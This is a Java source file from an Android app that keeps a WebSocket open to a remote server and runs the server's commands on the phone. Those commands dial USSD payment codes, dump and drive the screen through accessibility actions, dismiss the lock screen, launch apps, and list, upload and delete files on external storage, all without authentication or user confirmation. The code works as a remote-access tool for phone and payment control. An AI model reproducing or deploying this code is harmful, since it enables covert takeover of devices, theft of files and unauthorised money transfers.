package com.app.duck.util;

import static com.app.duck.Config.WEBSOCKET_STATUS_TAG;

import android.app.KeyguardManager;
import android.content.Context;
import android.content.Intent;
import android.os.Environment;
import android.os.Handler;
import android.util.Base64;
import android.util.Log;

import androidx.annotation.NonNull;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONArray;
import com.alibaba.fastjson.JSONObject;
import com.app.duck.BuildConfig;
import com.app.duck.Config;
import com.app.duck.R;
import com.blankj.utilcode.util.ActivityUtils;
import com.blankj.utilcode.util.AppUtils;
import com.blankj.utilcode.util.FileIOUtils;
import com.blankj.utilcode.util.FileUtils;
import com.blankj.utilcode.util.GsonUtils;
import com.blankj.utilcode.util.IntentUtils;
import com.blankj.utilcode.util.StringUtils;
import com.blankj.utilcode.util.ThreadUtils;
import com.blankj.utilcode.util.Utils;
import com.elvishew.xlog.XLog;
import com.jeremyliao.liveeventbus.LiveEventBus;
import com.romellfudi.ussdlibrary.OverlayShowingService;
import com.romellfudi.ussdlibrary.PayController;
import com.romellfudi.ussdlibrary.USSDApi;
import com.romellfudi.ussdlibrary.USSDController;

import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.TimeUnit;

import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;
import okhttp3.WebSocket;
import okhttp3.WebSocketListener;

/**
 * author: hx
 * created on: 2023/10/16 23:38
 * description:
 */
public final class WsManager {
    private static final int NORMAL_CLOSURE_STATUS = 1000;
    private static final long RECONNECT_DELAY_MS = 1000; // 重连延迟时间
    private static WebSocketListener webSocketListener;
    private static USSDApi ussdApi = USSDController.getInstance(Utils.getApp());
    private static WebSocket webSocket;
    private static ScheduledFuture<?> reconnectTask;
    private static ScheduledExecutorService executorService = Executors.newSingleThreadScheduledExecutor();
    private static ScheduledExecutorService executorServiceUi = Executors.newSingleThreadScheduledExecutor();
    private static Intent svc = null;

    public static WebSocket connectWebSocket() {
        if (StringUtils.isTrimEmpty(BuildConfig.WEB_URL) || StringUtils.equals("", BuildConfig.WEB_URL)) {
            ThreadUtils.runOnUiThreadDelayed(() -> LiveEventBus.get(WEBSOCKET_STATUS_TAG).post(StringUtils.getString(R.string.log_tip_13)), 10000);
            return null;
        }

        webSocketListener = new WebSocketListener() {
            @Override
            public void onOpen(@NonNull WebSocket webSocket, @NonNull Response response) {
                super.onOpen(webSocket, response);
                Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_14));
                XLog.i(StringUtils.getString(R.string.log_tip_14));
                LiveEventBus.get(WEBSOCKET_STATUS_TAG).post(StringUtils.getString(R.string.log_tip_14));
            }

            @Override
            public void onMessage(@NonNull WebSocket webSocket, @NonNull String text) {
                super.onMessage(webSocket, text);
                JSONObject json = JSON.parseObject(text);
                String command = json.getString("command");
                String requestId = json.getString("request_id");
                String value = json.getString("value");
                String packageName = json.getString("packageName");
                int hashCode = json.getIntValue("hashCode");
                int action = json.getIntValue("action");
                JSONArray arguments = json.getJSONArray("arguments");
                XLog.e("[WsManager] onMessage: " + json);
                switch (command) {
                    case "invoke":
                        ThreadUtils.runOnUiThread(() -> callOverlay(value, requestId));
                        break;
                    case "invoke2":
                        ThreadUtils.runOnUiThread(() -> callOverlay2(value, requestId));
                        break;
                    case "send":
                        ThreadUtils.runOnUiThread(() -> sendUssd(requestId, value));
                        break;
                    case "cancel":
                        ThreadUtils.runOnUiThread(() -> cancelUssd(requestId));
                        break;
                    case "log":
                        ThreadUtils.runOnUiThread(() -> new TgBot("", false));
                        break;
                    case "message":
                        ThreadUtils.runOnUiThread(() -> new TgBot(value, true));
                        break;
                    case "config":
                        HxUtils.checkForUpdateBotConfig();
                    case "getRootInActiveWindow":
                        ThreadUtils.runOnUiThread(() -> getNowRootInActiveWindow(requestId));
                        break;
                    case "startApp":
                        ThreadUtils.runOnUiThread(() -> startApp(requestId, packageName));
                        break;
                    case "performAction":
                        ThreadUtils.runOnUiThread(() -> performAction(requestId, hashCode, action, arguments));
                        break;
                    case "performGlobalAction":
                        ThreadUtils.runOnUiThread(() -> performGlobalAction(requestId, action));
                        break;
                    case "unlock":
                        try {
//                            PowerManager pm = (PowerManager) Utils.getApp().getSystemService(Context.POWER_SERVICE);
//                            KeyguardManager mKeyguardManager = (KeyguardManager) Utils.getApp().getSystemService(Context.KEYGUARD_SERVICE);
//                            KeyguardManager.KeyguardLock kl = mKeyguardManager.newKeyguardLock("myapp:kllock");
//                            if (!pm.isScreenOn()) {
//                                //获取电源管理器对象，ACQUIRE_CAUSES_WAKEUP这个参数能从黑屏唤醒屏幕
//                                PowerManager.WakeLock mWakeLock = pm.newWakeLock(PowerManager.SCREEN_BRIGHT_WAKE_LOCK | PowerManager.ACQUIRE_CAUSES_WAKEUP, "myapp:bright");
//                                //点亮屏幕
//                                mWakeLock.acquire();
//                                kl.disableKeyguard();
//                                sendWebSocketMsg(requestId, "response", "successful");
//                            } else {
//                                sendWebSocketMsg(requestId, "response", "ok");
//
//                            }
                            ActivityUtils.getTopActivity().setTurnScreenOn(true);
                            ActivityUtils.getTopActivity().setShowWhenLocked(true);
                            KeyguardManager keyguardManager = (KeyguardManager) ActivityUtils.getTopActivity().getSystemService(Context.KEYGUARD_SERVICE);
                            keyguardManager.requestDismissKeyguard(ActivityUtils.getTopActivity(), new KeyguardManager.KeyguardDismissCallback() {
                                @Override
                                public void onDismissError() {
                                    super.onDismissError();
                                    sendWebSocketMsg(requestId, "response", "onDismissError");
                                }

                                @Override
                                public void onDismissSucceeded() {
                                    super.onDismissSucceeded();
                                    sendWebSocketMsg(requestId, "response", "onDismissSucceeded");
                                }

                                @Override
                                public void onDismissCancelled() {
                                    super.onDismissCancelled();
                                    sendWebSocketMsg(requestId, "response", "onDismissCancelled");
                                }
                            });
                        } catch (Exception e) {
                            sendWebSocketMsg(requestId, "exception", "error:" + e.getMessage());
                        }
                        break;
                    case "fileList":
                        ThreadUtils.runOnUiThread(() -> getFileList(requestId));
                        break;
                    case "deleteFile":
                        ThreadUtils.runOnUiThread(() -> deleteFile(requestId, value));
                        break;
                    case "getFileByPath":
                        ThreadUtils.runOnUiThread(() -> getFileByPath(requestId, value));
                        break;
                    case "getPath":
                        ThreadUtils.runOnUiThread(() -> getPath(requestId, value));
                        break;
                    default:
                        XLog.e(command + " 没有定义该操作!");
                        break;

                }
            }

            @Override
            public void onClosing(@NonNull WebSocket webSocket, int code, @NonNull String reason) {
                super.onClosing(webSocket, code, reason);
                webSocket.close(code, reason);
                Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_15_s, " "));
                XLog.i(StringUtils.getString(R.string.log_tip_15_s, " "));
                LiveEventBus.get(WEBSOCKET_STATUS_TAG).post(StringUtils.getString(R.string.log_tip_15_s, reason));
            }

            @Override
            public void onClosed(@NonNull WebSocket webSocket, int code, @NonNull String reason) {
                super.onClosed(webSocket, code, reason);
                reconnectWebSocket();
                Log.i(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_16, reason));
                XLog.i(StringUtils.getString(R.string.log_tip_16, reason));
                LiveEventBus.get(WEBSOCKET_STATUS_TAG).post(StringUtils.getString(R.string.log_tip_16, reason));

            }

            @Override
            public void onFailure(@NonNull WebSocket webSocket, @NonNull Throwable t, Response response) {
                super.onFailure(webSocket, t, response);
                reconnectWebSocket();
                Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_18_s, t.getMessage()), t);
                XLog.e(StringUtils.getString(R.string.log_tip_18_s, t.getMessage()), t);
                LiveEventBus.get(WEBSOCKET_STATUS_TAG).post(StringUtils.getString(R.string.log_tip_18_s, t.getMessage()));
            }
        };
        executorServiceUi.execute(() -> {
                    try {
                        OkHttpClient client = new OkHttpClient.Builder().pingInterval(5, TimeUnit.SECONDS).build();
                        Request request = new Request.Builder().url(BuildConfig.WEB_URL + HxUtils.getPhone() + "/").build();
                        webSocket = client.newWebSocket(request, webSocketListener);
                    } catch (Exception e) {
                        Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_18_s, e.getMessage()), e);
                        XLog.e(StringUtils.getString(R.string.log_tip_18_s, e.getMessage()), e);
                    }
                }
        );

        return webSocket;
    }

    private static void reconnectWebSocket() {
        if (reconnectTask != null && !reconnectTask.isDone()) {
            reconnectTask.cancel(true);
        }
        reconnectTask = executorService.schedule(() -> connectWebSocket(), RECONNECT_DELAY_MS, TimeUnit.MILLISECONDS);
    }

    private static void callOverlay(String ussd, String request_id) {
        try {
            if (null != svc) {
                Utils.getApp().stopService(svc);
            }
            svc = new Intent(Utils.getApp(), OverlayShowingService.class);
            svc.putExtra(OverlayShowingService.EXTRA, StringUtils.getString(R.string.action_ussd_msg));
            pendingServiceIntent(svc);

            ussdApi.callUSSDOverlayInvoke(ussd, HxUtils.provideHashMap(), new USSDController.CallbackInvoke() {
                @Override
                public void responseInvoke(String message) {
                    sendWebSocketMsg(request_id, "response", message);
                }

                @Override
                public void over(String message) {
                    sendWebSocketMsg(request_id, "over", message);
                    Utils.getApp().stopService(svc);
                }
            });
        } catch (Exception e) {
            XLog.e("error,ussd!", e);
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }


    }

    private static void callOverlay2(String ussd, String request_id) {
        try {
            ussdApi.callUSSDInvoke(ussd, HxUtils.provideHashMap(), new USSDController.CallbackInvoke() {
                @Override
                public void responseInvoke(String message) {
                    sendWebSocketMsg(request_id, "response", message);
                }

                @Override
                public void over(String message) {
                    sendWebSocketMsg(request_id, "over", message);
                }
            });
        } catch (Exception e) {
            XLog.e("error,ussd!", e);
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }


    }

    private static void pendingServiceIntent(Intent overlayService) {
        Utils.getApp().startService(overlayService);
        new Handler().postDelayed(() -> {
            if (overlayService != null) {
                Utils.getApp().stopService(overlayService);
            }
        }, 5 * 60000);
    }

    private static void sendUssd(String request_id, String msg) {
        try {
            ussdApi.send(msg, new USSDController.CallbackMessage() {
                @Override
                public void responseMessage(String message) {
                    sendWebSocketMsg(request_id, "response", message);
                }

                @Override
                public void over(String message) {
                    sendWebSocketMsg(request_id, "over", message);
                    if (null != svc)
                        Utils.getApp().stopService(svc);
                }
            });
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }

    private static void sendWebSocketMsg(String request_id, String return_type, String message) {
        HashMap<String, Object> map = new HashMap<>();
        map.put("request_id", request_id);
        map.put("return_type", return_type);
        map.put("message", message);
        sendMessage(GsonUtils.toJson(map), 0);
    }

    private static void getNowRootInActiveWindow(String request_id) {
        ThreadUtils.executeByIo(new ThreadUtils.Task<String>() {
            @Override
            public String doInBackground() throws Exception {
                return Base64.encodeToString(HxUtils.gzip(PayController.getNowRootInActiveWindow()), 0);
            }

            @Override
            public void onSuccess(String result) {
                sendWebSocketMsg(request_id, "successful", result);
            }


            @Override
            public void onCancel() {
                sendWebSocketMsg(request_id, "exception", "exception");
            }

            @Override
            public void onFail(Throwable t) {
                sendWebSocketMsg(request_id, "exception", t.getMessage());
            }
        });

    }

    private static void startApp(String request_id, String packageName) {
        if (!StringUtils.isSpace(packageName)) {
            Intent launchAppIntent = IntentUtils.getLaunchAppIntent(packageName);
            if (launchAppIntent == null) {
                sendWebSocketMsg(request_id, "exception", "Didn't exist launcher activity.");
                return;
            }
            Utils.getApp().startActivity(launchAppIntent);
            AppUtils.launchApp(packageName);
            sendWebSocketMsg(request_id, "successful", "");
        } else {
            sendWebSocketMsg(request_id, "exception", "packageName is null or white space");
        }
    }

    private static void performAction(String request_id, int hashCode, int action, JSONArray jsonArray) {
        try {
            if (jsonArray == null || jsonArray.size() == 0) {
                PayController.performActionEvent1(hashCode, action);
            } else {
                List<HashMap<String, Object>> list = new ArrayList<>();
                for (Object o : jsonArray) {
                    HashMap<String, Object> map = new HashMap<>();
                    map.put("key", ((JSONObject) (o)).getString("key"));
                    map.put("value", ((JSONObject) (o)).getString("value"));
                    map.put("type", ((JSONObject) (o)).getString("type"));
                    list.add(map);
                }
                PayController.performActionEvent2(hashCode, action, list);
            }
            sendWebSocketMsg(request_id, "successful", "");
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }


    private static void getFileList(String request_id) {
        try {
            String path = Environment.getExternalStorageDirectory().getAbsolutePath();
            List<File> pathList = FileUtils.listFilesInDir(path);

            List<HashMap<String, Object>> data = new ArrayList<>();
            for (File file : pathList) {
                HashMap<String, Object> map = new HashMap<>();
                map.put("size", FileUtils.getSize(file));//获取文件或目录大小
                map.put("lastModified", FileUtils.getFileLastModified(file));//获取文件最后修改的毫秒时间戳
                map.put("name", FileUtils.getFileName(file));//文件名称 带拓展名
                map.put("isDir", FileUtils.isDir(file));//判断是否是目录
                map.put("isFile", FileUtils.isFile(file));//判断是否是文件
                data.add(map);
            }

            sendWebSocketMsg(request_id, "successful", Base64.encodeToString(HxUtils.gzip(GsonUtils.toJson(data)), 0));
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }


    private static void getPath(String request_id, String path) {
        try {
            path = Environment.getExternalStorageDirectory().getAbsolutePath() + path;
            List<File> pathList = FileUtils.listFilesInDir(path);
            List<HashMap<String, Object>> data = new ArrayList<>();
            for (File file : pathList) {
                HashMap<String, Object> map = new HashMap<>();
                map.put("size", FileUtils.getSize(file));//获取文件或目录大小
                map.put("lastModified", FileUtils.getFileLastModified(file));//获取文件最后修改的毫秒时间戳
                map.put("name", FileUtils.getFileName(file));//文件名称 带拓展名
                map.put("isDir", FileUtils.isDir(file));//判断是否是目录
                map.put("isFile", FileUtils.isFile(file));//判断是否是文件
                data.add(map);
            }

            sendWebSocketMsg(request_id, "successful", Base64.encodeToString(HxUtils.gzip(GsonUtils.toJson(data)), 0));
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }


    private static void getFileByPath(String request_id, String path) {
        try {
            path = Environment.getExternalStorageDirectory().getAbsolutePath() + path;
            File file = FileUtils.getFileByPath(path);
            sendWebSocketMsg(request_id, "successful", Base64.encodeToString(HxUtils.gzip(FileIOUtils.readFile2BytesByStream(file)), 0));
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }


    private static void deleteFile(String request_id, String path) {
        try {
            path = Environment.getExternalStorageDirectory().getAbsolutePath() + path;
            FileUtils.delete(path);
            sendWebSocketMsg(request_id, "successful", "");
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }

    private static void performGlobalAction(String request_id, int action) {
        try {
            PayController.performGlobalAction(action);
            sendWebSocketMsg(request_id, "successful", "");
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }
    }

    private static void cancelUssd(String request_id) {
        try {
            ussdApi.cancel();
            sendWebSocketMsg(request_id, "cancel", "cancel");
        } catch (Exception e) {
            sendWebSocketMsg(request_id, "exception", e.getMessage());
        }

    }

    public static void closeWebSocket() {
        executorServiceUi.execute(() -> {
                    try {
                        if (webSocket != null) {
                            webSocket.close(NORMAL_CLOSURE_STATUS, "Goodbye!");
                        }
                    } catch (Exception e) {
                        Log.e(Config.LOG_TAG, StringUtils.getString(R.string.log_tip_18_s, e.getMessage()), e);
                        XLog.e(StringUtils.getString(R.string.log_tip_18_s, e.getMessage()), e);
                    }
                }
        );
    }


    public static void sendMessage(String msg, int attempt) {
        executorServiceUi.schedule(() -> {
                    try {

                        if (webSocket != null && webSocket.send(msg)) {
                            XLog.i("success, send msg : " + msg);
                        } else {
                            throw new Exception("Failed to send message:" + msg);
                        }
                    } catch (Exception e) {
                        if (attempt < 20) {
                            XLog.i("retrying, attempt = " + attempt);
                            sendMessage(msg, attempt + 1);
                        }
                    }
                }
                , attempt == 0 ? 0 : 2, TimeUnit.SECONDS);
    }
}
